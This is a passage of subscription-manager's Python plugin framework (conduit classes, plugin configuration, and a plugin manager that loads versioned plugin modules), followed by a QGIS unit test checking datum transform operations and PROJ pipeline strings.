def __init__(self, clazz, consumer, facts):
"""init for PostRegistrationConduit
Args:
consumer: an object representing the
registered consumer
facts: a dictionary of system facts
"""
super(PostRegistrationConduit, self).__init__(clazz)
self.consumer = consumer
self.facts = facts
class ProductConduit(BaseConduit):
"""Conduit for use with plugins that handle product id functions."""
slots = ['pre_product_id_install', 'post_product_id_install']
def __init__(self, clazz, product_list):
"""init for ProductConduit
Args:
product_list: A list of ProductCertificate objects
"""
super(ProductConduit, self).__init__(clazz)
self.product_list = product_list
class ProductUpdateConduit(BaseConduit):
"""Conduit for use with plugins that handle product id update functions."""
slots = ['pre_product_id_update', 'post_product_id_update']
def __init__(self, clazz, product_list):
"""init for ProductUpdateConduit
Args:
product_list: A list of ProductCertificate objects
"""
super(ProductUpdateConduit, self).__init__(clazz)
self.product_list = product_list
class FactsConduit(BaseConduit):
"""Conduit for collecting facts."""
slots = ['post_facts_collection']
def __init__(self, clazz, facts):
"""init for FactsConduit
Args:
facts: a dictionary of system facts
"""
super(FactsConduit, self).__init__(clazz)
self.facts = facts
class UpdateContentConduit(BaseConduit):
"""Conduit for updating content."""
slots = ['update_content']
def __init__(self, clazz, reports, ent_source):
"""init for UpdateContentConduit.
Args:
reports: a list of reports
ent_source: a EntitlementSource instance
"""
super(UpdateContentConduit, self).__init__(clazz)
self.reports = reports
self.ent_source = ent_source
class SubscriptionConduit(BaseConduit):
"""Conduit for subscription info."""
slots = ['pre_subscribe']
def __init__(self, clazz, consumer_uuid, pool_id, quantity):
"""init for SubscriptionConduit
Args:
consumer_uuid: the UUID of the consumer being subscribed
pool_id: the id of the pool the subscription will come from (None if 'auto' is False)
quantity: the quantity to consume from the pool (None if 'auto' is False).
        """
super(SubscriptionConduit, self).__init__(clazz)
self.consumer_uuid = consumer_uuid
self.pool_id = pool_id
self.quantity = quantity
class PostSubscriptionConduit(BaseConduit):
slots = ['post_subscribe']
def __init__(self, clazz, consumer_uuid, entitlement_data):
"""init for PostSubscriptionConduit
Args:
consumer_uuid: the UUID of the consumer subscribed
entitlement_data: the data returned by the server
"""
super(PostSubscriptionConduit, self).__init__(clazz)
self.consumer_uuid = consumer_uuid
self.entitlement_data = entitlement_data
class AutoAttachConduit(BaseConduit):
slots = ['pre_auto_attach']
def __init__(self, clazz, consumer_uuid):
"""
init for AutoAttachConduit
Args:
consumer_uuid: the UUID of the consumer being auto-subscribed
"""
super(AutoAttachConduit, self).__init__(clazz)
self.consumer_uuid = consumer_uuid
class PostAutoAttachConduit(PostSubscriptionConduit):
slots = ['post_auto_attach']
def __init__(self, clazz, consumer_uuid, entitlement_data):
"""init for PostAutoAttachConduit
Args:
consumer_uuid: the UUID of the consumer subscribed
entitlement_data: the data returned by the server
"""
super(PostAutoAttachConduit, self).__init__(clazz, consumer_uuid, entitlement_data)
class PluginConfig(object):
"""Represents configuation for each rhsm plugin.
Attributes:
plugin_conf_path: where plugin config files are found
        plugin_key: a string identifier for plugins, for example 'facts.FactsPlugin'.
                    Used to find the configuration file.
"""
plugin_key = None
def __init__(self, plugin_key,
plugin_conf_path=None):
"""init for PluginConfig.
Args:
plugin_key: string id for class
plugin_conf_path: string file path to where plugin config files are found
Raises:
PluginConfigException: error when finding or loading plugin config
"""
self.plugin_conf_path = plugin_conf_path
self.plugin_key = plugin_key
self.conf_files = []
self.parser = SafeConfigParser()
# no plugin_conf_path uses the default empty list of conf files
if self.plugin_conf_path:
self._get_config_file_path()
try:
self.parser.read(self.conf_files)
except Exception as e:
raise PluginConfigException(self.plugin_key, e)
def _get_config_file_path(self):
conf_file = os.path.join(self.plugin_conf_path, self.plugin_key + ".conf")
if not os.access(conf_file, os.R_OK):
raise PluginConfigException(self.plugin_key, "Unable to find configuration file")
# iniparse can handle a list of files, inc an empty list
# reading an empty list is basically the None constructor
self.conf_files.append(conf_file)
def is_plugin_enabled(self):
"""returns True if the plugin is enabled in it's config."""
try:
enabled = self.parser.getboolean('main', 'enabled')
except Exception as e:
raise PluginConfigException(self.plugin_key, e)
if not enabled:
log.debug("Not loading \"%s\" plugin as it is disabled" % self.plugin_key)
return False
return True
def __str__(self):
buf = "plugin_key: %s\n" % (self.plugin_key)
for conf_file in self.conf_files:
buf = buf + "config file: %s\n" % conf_file
# config file entries
buf = buf + str(self.parser.data)
return buf
class PluginHookRunner(object):
"""Encapsulates a Conduit() instance and a bound plugin method.
PluginManager.runiter() returns an iterable that will yield
a PluginHookRunner for each plugin hook to be triggered.
"""
def __init__(self, conduit, func):
self.conduit = conduit
self.func = func
def run(self):
try:
self.func(self.conduit)
except Exception as e:
log.exception(e)
raise
# NOTE: need to be super paranoid here about the existence of cfg variables
# BasePluginManager with our default config info
class BasePluginManager(object):
"""Finds, load, and provides acccess to subscription-manager plugins."""
def __init__(self, search_path=None, plugin_conf_path=None):
"""init for BasePluginManager().
attributes:
conduits: BaseConduit subclasses that can register slots
search_path: where to find plugin modules
plugin_conf_path: where to find plugin config files
_plugins: map of a plugin_key to a SubManPlugin instance
_plugin_classes: list of plugin classes found
_slot_to_funcs: map of a slotname to a list of plugin methods that handle it
_slot_to_conduit: map of a slotname to the Conduit() that is passed
to the associated slot
"""
self.search_path = search_path
self.plugin_conf_path = plugin_conf_path
# list of modules to load plugins from
self.modules = self._get_modules()
# we track which modules we try to load plugins from
self._modules = {}
# self._plugins is mostly for bookkeeping, it's a dict
# that maps 'plugin_key':instance
# 'plugin_key', aka plugin_module.plugin_class
# instance is the instantiated plugin class
self._plugins = {}
# all found plugin classes, including classes that
# are disabled, and will not be instantiated
self._plugin_classes = {}
self.conduits = []
# maps a slot_name to a list of methods from a plugin class
self._slot_to_funcs = {}
self._slot_to_conduit = {}
# find our list of conduits
self.conduits = self._get_conduits()
# populate self._slot_to_conduit
# and create keys for self._slot_to_funcs
self._populate_slots()
# populate self._plugins with plugins in modules in self.modules
self._import_plugins()
def _get_conduits(self):
"""Needs to be implemented in subclass.
Returns:
A list of Conduit classes
"""
return []
def _get_modules(self):
"""Needs to be implemented in subclass.
Returns:
A list of modules to load plugins classes from
"""
return []
def _import_plugins(self):
"""Needs to be implemented in subclass.
This loads plugin modules, checks them, and loads plugins
from them with self.add_plugins_from_module
"""
# by default, we create PluginConfig's as needed, so no need for
# plugin_to_config_map to be passed in
self.add_plugins_from_modules(self.modules)
log.debug("loaded plugin modules: %s" % self.modules)
log.debug("loaded plugins: %s" % self._plugins)
def _populate_slots(self):
for conduit_class in self.conduits:
slots = conduit_class.slots
for slot in slots:
self._slot_to_conduit[slot] = conduit_class
self._slot_to_funcs[slot] = []
def add_plugins_from_modules(self, modules, plugin_to_config_map=None):
"""Add SubMan plugins from a list of modules
Args:
modules: a list of python module objects
plugin_to_config_map: a dict mapping a plugin_key to a PluginConfig
object. If a plugin finds its config in here,
that is used instead of creating a new PluginConfig()
(which needs an actual file in plugin_conf_dir)
Side effects:
whatever add_plugins_from_module does to self
"""
for module in modules:
try:
self.add_plugins_from_module(module,
plugin_to_config_map=plugin_to_config_map)
except PluginException as e:
log.exception(e)
log.error(e)
def add_plugins_from_module(self, module, plugin_to_config_map=None):
"""add SubManPlugin based plugins from a module.
Will also look for a PluginConfig() associated with the
SubManPlugin classes. Config files should be in self.plugin_conf_path
and named in the format "moduleName.plugin_class_name.conf"
Args:
module: an import python module object, that contains
SubManPlugin subclasses.
plugin_to_config_map: a dict mapping a plugin_key to a PluginConfig
object. If a plugin finds its config in here,
that is used instead of creating a new PluginConfig()
Side Effects:
self._modules is populated
whatever add_plugin_class does
Raises:
PluginException: multiple plugins with the same name
"""
# track the modules we try to load plugins from
# we'll add plugin classes if we find them
self._modules[module] = []
# verify we are a class, and in particular, a subclass
# of SubManPlugin
def is_plugin(c):
return inspect.isclass(c) and c.__module__ == module.__name__ and issubclass(c, SubManPlugin)
# note we sort the list of plugin classes, since that potentially
# alters order hooks are mapped to slots
plugin_classes = sorted(inspect.getmembers(module, is_plugin))
# find all the plugin classes with valid configs first
# then add them, so we skip the module if a class has a bad config
found_plugin_classes = []
for _name, clazz in sorted(plugin_classes):
# We could have the module conf here, and check in that
# instead of a per class config. We would not be able to
# override a disabled module per class, but that's probably okay
found_plugin_classes.append(clazz)
for plugin_class in found_plugin_classes:
# NOTE: we currently do not catch plugin init exceptions
# here, and let them bubble. But we could...? that would
# let some classes from a module fail
self.add_plugin_class(plugin_class,
plugin_to_config_map=plugin_to_config_map)
def add_plugin_class(self, plugin_clazz, plugin_to_config_map=None):
"""Add a SubManPlugin and PluginConfig class to PluginManager.
Args:
plugin_clazz: A SubManPlugin child class, with a
.conf PluginConfig() class
plugin_to_config_map: a dict mapping a plugin_key to a PluginConfig
object. If a plugin finds its config in here,
that is used instead of creating a new PluginConfig()
Side effects:
self._plugin_classes is populated with all found plugin classes
self._modules is populated with plugin classes per plugin module
self._plugins is populated with valid and enabled plugin instances
Raises:
PluginException: multiple plugins with the same name
"""
# either look up what we were passed, or create a new PluginConfig
# default is to create a PluginConfig
plugin_conf = self._get_plugin_config(plugin_clazz,
plugin_to_config_map=plugin_to_config_map)
# associate config with plugin class
# NOTE: the plugin_class has a PluginConfig instance for its conf
plugin_clazz.conf = plugin_conf
plugin_key = plugin_clazz.conf.plugin_key
# if plugin is not enabled, it doesn't get added, but
# we do track it as a plugin_class we looked at
if not plugin_clazz.conf.is_plugin_enabled():
self._plugin_classes[plugin_key] = plugin_clazz
log.debug("%s was disabled via it's config: %s" % (plugin_clazz, plugin_clazz.conf))
return
# this is an enabled plugin, so track its module as well
# if we haven't already
self._track_plugin_class_to_modules(plugin_clazz)
# if we fail to init any plugin classes, the exceptions are not
# caught
instance = plugin_clazz()
# track its instance
if plugin_key not in self._plugins:
self._plugins[plugin_key] = instance
else:
# This shouldn't ever happen
raise PluginException("Two or more plugins with the name \"%s\" exist "
"in the plugin search path" %
plugin_clazz.__name__)
# this is a valid plugin, with config, that instantiates, and is not a dupe
self._plugin_classes[plugin_key] = plugin_clazz
# look for any plugin class methods that match the name
# format of slot_name_hook
# only look for func's that match slot's we have in our conduits
class_is_used = False
for slot in list(self._slot_to_funcs.keys()):
func_name = slot + "_hook"
if instance.all_slots or hasattr(instance, func_name):
# FIXME: document that all_hooks could result in calls to
# plugin class for methods that map to slots that it may
# not have known about. aka, all_hooks is complicated
# verify the hook is a callable
if callable(getattr(instance, func_name)):
self._slot_to_funcs[slot].append(getattr(instance, func_name))
class_is_used = True
else:
# found the attribute, but it is not callable
# note we let AttributeErrors bubble up
log.debug("%s plugin does not have a callable() method %s" % (plugin_key, func_name))
# if we found at least one slot for this class's hooks, note that on the plugin class
if class_is_used:
plugin_clazz.found_slots_for_hooks = True
def _track_plugin_class_to_modules(self, plugin_clazz):
"""Keep a map of plugin classes loaded from each plugin module."""
if plugin_clazz.__module__ not in self._modules:
self._modules[plugin_clazz.__module__] = []
self._modules[plugin_clazz.__module__].append(plugin_clazz)
def run(self, slot_name, **kwargs):
"""For slot_name, run the registered hooks with kwargs.
Args:
slot_name: a string of the slot_name. Typically of form
'post_someplace_something'
kwargs: kwargs dict of arguments to pass to the SubManPlugin
hook methods. These will be passed to the Conduit
instance associated with 'slot_name'
Returns:
Nothing.
Raises:
SlotNameException: slot_name isn't found
(Anything else is plugin and conduit specific)
"""
for runner in self.runiter(slot_name, **kwargs):
runner.run()
def runiter(self, slot_name, **kwargs):
"""Return an iterable of PluginHookRunner objects.
The iterable will return a PluginHookRunner object
for each plugin hook mapped to slot_name. Multiple plugins
with hooks for the same slot will result in multiple
PluginHookRunners in the iterable.
See run() docs for what to expect from PluginHookRunner.run().
"""
# the slot called should always exist here; if not, raise
if slot_name not in self._slot_to_funcs:
raise SlotNameException(slot_name)
for func in self._slot_to_funcs[slot_name]:
module = inspect.getmodule(func)
func_module_name = getattr(func, '__module__')
if not func_module_name:
if module:
func_module_name = module.__name__
else:
func_module_name = 'unknown_module'
func_class_name = func.__self__.__class__.__name__
plugin_key = ".".join([func_module_name, func_class_name])
log.debug("Running %s in %s" % (func.__name__, plugin_key))
# resolve slot_name to conduit
# FIXME: handle cases where we don't have a conduit for a slot_name
# (should be able to handle this since we map those at the same time)
conduit = self._slot_to_conduit[slot_name]
try:
# create a Conduit
# FIXME: handle cases where we can't create a Conduit()
conduit_instance = conduit(func.__self__.__class__, **kwargs)
# TypeError tends to mean we provided the wrong kwargs for this
# conduit
# if we get an Exception above, should we exit early, or
# continue onto other hooks. A conduit could fail for
# something specific to func.__class__, but unlikely
except Exception as e:
log.exception(e)
raise
runner = PluginHookRunner(conduit_instance, func)
yield runner
def _get_plugin_config(self, plugin_clazz, plugin_to_config_map=None):
"""Get a PluginConfig for plugin_class, creating it if need be.
If we have an entry in plugin_to_config_map for plugin_class,
return that PluginConfig. Otherwise, we create a PluginConfig()
Note that PluginConfig() will expect to find a config file in
self.plugin_conf_path, and will fail if that is not the case.
Args:
plugin_clazz: A SubManPlugin subclass
plugin_to_config_map: A map of plugin_key to PluginConfig objects
Returns:
A PluginConfig() object
"""
if plugin_to_config_map:
if plugin_clazz.get_plugin_key() in plugin_to_config_map:
return plugin_to_config_map[plugin_clazz.get_plugin_key()]
return PluginConfig(plugin_clazz.get_plugin_key(), self.plugin_conf_path)
def get_plugins(self):
"""list of plugins."""
return self._plugin_classes
def get_slots(self):
"""list of slots
Ordered by conduit name, for presentation.
"""
# I'm sure a clever list comprehension could replace this with one line
#
# The default sort of slots is pure lexical, so all the pre's come
# first, which is weird. So this just sorts the slots by conduit name,
# then by slot name
conduit_to_slots = {}
for slot, conduit in list(self._slot_to_conduit.items()):
# sigh, no defaultdict on 2.4
if conduit not in conduit_to_slots:
conduit_to_slots[conduit] = []
conduit_to_slots[conduit].append(slot)
sorted_slots = []
for conduit in sorted(conduit_to_slots.keys(), key=lambda c: str(c)):
for slot in sorted(conduit_to_slots[conduit]):
sorted_slots.append(slot)
return sorted_slots
class PluginManager(BasePluginManager):
"""Finds, load, and provides acccess to subscription-manager plugins
using subscription-manager default plugin search path and plugin
conf path.
"""
default_search_path = DEFAULT_SEARCH_PATH
default_conf_path = DEFAULT_CONF_PATH
def __init__(self, search_path=None, plugin_conf_path=None):
"""init PluginManager
Args:
search_path: if not specified, use the configured 'pluginDir'
plugin_conf_path: if not specified, use the configured 'pluginConfDir'
"""
cfg_search_path = None
cfg_conf_path = None
try:
cfg_search_path = cfg.get("rhsm", "pluginDir")
cfg_conf_path = cfg.get("rhsm", "pluginConfDir")
except NoOptionError:
log.warning("no config options found for plugin paths, using defaults")
cfg_search_path = None
cfg_conf_path = None
init_search_path = search_path or cfg_search_path or self.default_search_path
init_plugin_conf_path = plugin_conf_path or cfg_conf_path \
or self.default_conf_path
super(PluginManager, self).__init__(search_path=init_search_path,
plugin_conf_path=init_plugin_conf_path)
def _get_conduits(self):
"""get subscription-manager specific plugin conduits."""
# we should be able to collect this from the sub classes of BaseConduit
return [
BaseConduit, ProductConduit, ProductUpdateConduit,
RegistrationConduit, PostRegistrationConduit,
FactsConduit, SubscriptionConduit,
UpdateContentConduit,
PostSubscriptionConduit,
AutoAttachConduit, PostAutoAttachConduit,
]
def _get_modules(self):
module_files = self._find_plugin_module_files(self.search_path)
plugin_modules = self._load_plugin_module_files(module_files)
return plugin_modules
# subman specific module/plugin loading
def _find_plugin_module_files(self, search_path):
"""Load all the plugins in the search path.
Raise:
PluginException: plugin load fails
"""
module_files = []
if not os.path.isdir(search_path):
log.error("Could not find %s for plugin import" % search_path)
# NOTE: if this is not found, we don't load any plugins
# so self._plugins/_plugins_funcs are empty
return []
mask = os.path.join(search_path, "*.py")
for module_file in sorted(glob.glob(mask)):
module_files.append(module_file)
# for consistency
module_files.sort()
return module_files
def _load_plugin_module_files(self, module_files):
modules = []
for module_file in module_files:
try:
modules.append(self._load_plugin_module_file(module_file))
except PluginException as e:
log.error(e)
return modules
def _load_plugin_module_file(self, module_file):
"""Loads SubManPlugin class from a module file.
Args:
module_file: file path to a python module containing SubManPlugin based classes
Raises:
PluginImportException: module_file could not be imported
PluginImportApiVersionMissingException: module_file has no api version requirement
PluginImportApiVersionException: module's api version requirement cannot be met
"""
dir_path, module_name = os.path.split(module_file)
module_name = module_name.split(".py")[0]
try:
spec = importlib.util.spec_from_file_location(module_name, module_file)
loaded_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(loaded_module)
# we could catch BaseException too for system exit
except Exception as e:
log.exception(e)
raise PluginModuleImportException(module_file, module_name)
# FIXME: look up module conf, so we can enable entire plugin modules
if not hasattr(loaded_module, "requires_api_version"):
raise PluginModuleImportApiVersionMissingException(module_file, module_name,
"Plugin doesn't specify required API version")
if not api_version_ok(API_VERSION, loaded_module.requires_api_version):
raise PluginModuleImportApiVersionException(module_file, module_name,
module_ver=loaded_module.requires_api_version,
api_ver=API_VERSION)
return loaded_module
def parse_version(api_version):
"""parse an API version string into major and minor version strings."""
maj_ver, min_ver = api_version.split('.')
return int(maj_ver), int(min_ver)
def api_version_ok(a, b):
"""
Return true if API version "a" supports API version "b"
"""
a = parse_version(a)
b = parse_version(b)
if a[0] != b[0]:
return False
if a[1] >= b[1]:
return True
return False
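# A minimal sketch of driving the plugin machinery (the paths, slot name,
# and kwargs below are hypothetical, not taken from this module).
# PluginManager discovers plugins at construction time; run() then fires
# every hook registered for a slot:
#
#   pm = PluginManager(search_path="/tmp/plugins",
#                      plugin_conf_path="/tmp/plugin-conf")
#   pm.run("post_register_consumer", consumer=consumer, facts=facts)
#
# api_version_ok() compares (major, minor) pairs: the major versions must
# match exactly and the provided minor must be at least the required one,
# e.g. api_version_ok("1.1", "1.0") is True while
# api_version_ok("2.0", "1.0") is False.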
|
candlepin/subscription-manager
|
src/subscription_manager/plugins.py
|
Python
|
gpl-2.0
| 37,132
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDatumTransforms.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Nyall Dawson'
__date__ = '2019-05-25'
__copyright__ = 'Copyright 2019, The QGIS Project'
from qgis.core import (
QgsProjUtils,
QgsCoordinateReferenceSystem,
QgsDatumTransform
)
from qgis.testing import (start_app,
unittest,
)
from utilities import unitTestDataPath
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestPyQgsDatumTransform(unittest.TestCase):
@unittest.skipIf(QgsProjUtils.projVersionMajor() < 6, 'Not a proj6 build')
def testOperations(self):
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem(),
QgsCoordinateReferenceSystem())
self.assertEqual(ops, [])
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem())
self.assertEqual(ops, [])
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem(),
QgsCoordinateReferenceSystem('EPSG:3111'))
self.assertEqual(ops, [])
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem('EPSG:3111'))
self.assertEqual(len(ops), 1)
self.assertTrue(ops[0].name)
self.assertEqual(ops[0].proj, '+proj=noop')
self.assertEqual(ops[0].accuracy, 0.0)
self.assertTrue(ops[0].isAvailable)
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem('EPSG:4283'))
self.assertEqual(len(ops), 1)
self.assertTrue(ops[0].name)
self.assertEqual(ops[0].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[0].accuracy, -1.0)
self.assertTrue(ops[0].isAvailable)
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem('EPSG:28355'))
self.assertEqual(len(ops), 1)
self.assertTrue(ops[0].name)
self.assertEqual(ops[0].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=utm +zone=55 +south +ellps=GRS80')
self.assertEqual(ops[0].accuracy, 0.0)
self.assertTrue(ops[0].isAvailable)
# uses a grid file
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:4283'),
QgsCoordinateReferenceSystem('EPSG:7844'))
self.assertGreaterEqual(len(ops), 5)
op1_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=push +v_3 +step +proj=cart +ellps=GRS80 +step +proj=helmert +x=0.06155 +y=-0.01087 +z=-0.04019 +rx=-0.0394924 +ry=-0.0327221 +rz=-0.0328979 +s=-0.009994 +convention=coordinate_frame +step +inv +proj=cart +ellps=GRS80 +step +proj=pop +v_3 +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
self.assertTrue(ops[op1_index].name)
self.assertEqual(ops[op1_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=push +v_3 +step +proj=cart +ellps=GRS80 +step +proj=helmert +x=0.06155 +y=-0.01087 +z=-0.04019 +rx=-0.0394924 +ry=-0.0327221 +rz=-0.0328979 +s=-0.009994 +convention=coordinate_frame +step +inv +proj=cart +ellps=GRS80 +step +proj=pop +v_3 +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertTrue(ops[op1_index].isAvailable)
self.assertEqual(ops[op1_index].accuracy, 0.01)
self.assertEqual(len(ops[op1_index].grids), 0)
if QgsProjUtils.projVersionMajor() == 6:
op2_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_and_distortion.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
else:
op2_index = [i for i in range(len(ops))
if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_and_distortion.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
self.assertTrue(ops[op2_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op2_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_and_distortion.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg')
else:
self.assertEqual(ops[op2_index].proj,
'+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_and_distortion.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[op2_index].accuracy, 0.05)
self.assertEqual(len(ops[op2_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op2_index].grids[0].shortName, 'GDA94_GDA2020_conformal_and_distortion.gsb')
else:
self.assertEqual(ops[op2_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal_and_distortion.tif')
self.assertEqual(ops[op2_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op2_index].grids[0].packageName)
self.assertIn('http', ops[op2_index].grids[0].url)
self.assertTrue(ops[op2_index].grids[0].directDownload)
self.assertTrue(ops[op2_index].grids[0].openLicense)
if QgsProjUtils.projVersionMajor() == 6:
op3_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
else:
op3_index = [i for i in range(len(ops))
if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
self.assertTrue(ops[op3_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op3_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg')
else:
self.assertEqual(ops[op3_index].proj,
'+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[op3_index].accuracy, 0.05)
self.assertEqual(len(ops[op3_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op3_index].grids[0].shortName, 'GDA94_GDA2020_conformal.gsb')
else:
self.assertEqual(ops[op3_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal.tif')
self.assertEqual(ops[op3_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op3_index].grids[0].packageName)
self.assertIn('http', ops[op3_index].grids[0].url)
self.assertTrue(ops[op3_index].grids[0].directDownload)
self.assertTrue(ops[op3_index].grids[0].openLicense)
if QgsProjUtils.projVersionMajor() == 6:
op4_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_cocos_island.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
else:
op4_index = [i for i in range(len(ops))
if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_cocos_island.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
self.assertTrue(ops[op4_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op4_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_cocos_island.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg')
else:
self.assertEqual(ops[op4_index].proj,
'+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_cocos_island.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[op4_index].accuracy, 0.05)
self.assertEqual(len(ops[op4_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op4_index].grids[0].shortName, 'GDA94_GDA2020_conformal_cocos_island.gsb')
else:
self.assertEqual(ops[op4_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal_cocos_island.tif')
self.assertEqual(ops[op4_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op4_index].grids[0].packageName)
self.assertIn('http', ops[op4_index].grids[0].url)
if QgsProjUtils.projVersionMajor() == 6:
op5_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_christmas_island.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
else:
op5_index = [i for i in range(len(ops))
if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_christmas_island.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
self.assertTrue(ops[op5_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op5_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_christmas_island.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg')
else:
self.assertEqual(ops[op5_index].proj,
'+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_christmas_island.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[op5_index].accuracy, 0.05)
self.assertEqual(len(ops[op5_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op5_index].grids[0].shortName, 'GDA94_GDA2020_conformal_christmas_island.gsb')
else:
self.assertEqual(ops[op5_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal_christmas_island.tif')
self.assertEqual(ops[op5_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op5_index].grids[0].packageName)
self.assertIn('http', ops[op5_index].grids[0].url)
# uses a pivot datum (technically a proj test, but this will help me sleep at night ;)
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem('EPSG:7899'))
self.assertGreaterEqual(len(ops), 3)
op1_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=push +v_3 +step +proj=cart +ellps=GRS80 +step +proj=helmert +x=0.06155 +y=-0.01087 +z=-0.04019 +rx=-0.0394924 +ry=-0.0327221 +rz=-0.0328979 +s=-0.009994 +convention=coordinate_frame +step +inv +proj=cart +ellps=GRS80 +step +proj=pop +v_3 +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][0]
self.assertTrue(ops[op1_index].name)
